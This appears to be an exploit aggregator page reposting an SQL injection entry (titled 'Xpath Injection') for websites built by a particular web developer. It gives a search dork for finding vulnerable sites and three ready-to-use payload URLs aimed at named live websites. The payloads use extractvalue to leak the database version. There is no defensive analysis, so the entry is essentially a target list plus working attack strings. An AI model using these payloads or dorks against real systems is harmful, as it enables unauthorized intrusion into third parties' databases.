Fr. Evan Gomes SVD Xpath Injection Vulnerability
CVE
Category
Price
Severity
N/A
CWE-91
$5000
Critical
Author
Risk
Exploitation Type
Date
Evan Gomes
Critical
Remote
2021-03-04
CPE
cpe:cpe:/a:example:application:1.0
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021030018 Fr. Evan Gomes SVD Xpath Injection Vulnerability # Exploit Title: Fr. Evan Gomes SVD Xpath Injection Vulnerability
# Exploit Author: Behrouz Mansoori
# Date: 2021/03/02
# Dork : "Website Maintained by Fr. Evan Gomes SVD"
# Tested On: Windows 10 / Firefox
#####################################
#poc:
serach Dork : "Website Maintained by Fr. Evan Gomes SVD"
#demo:
https://sarvasevasanghmumbai.org/section.php?section_id=1%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
https://www.svdinm.com/section.php?section_id=29%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
https://starnoldsaduvassery.com/web/view_album.php?album_id=2%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
#####################################
Email : [email protected]
Instagram : behrouz_mansoori
#####################################
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum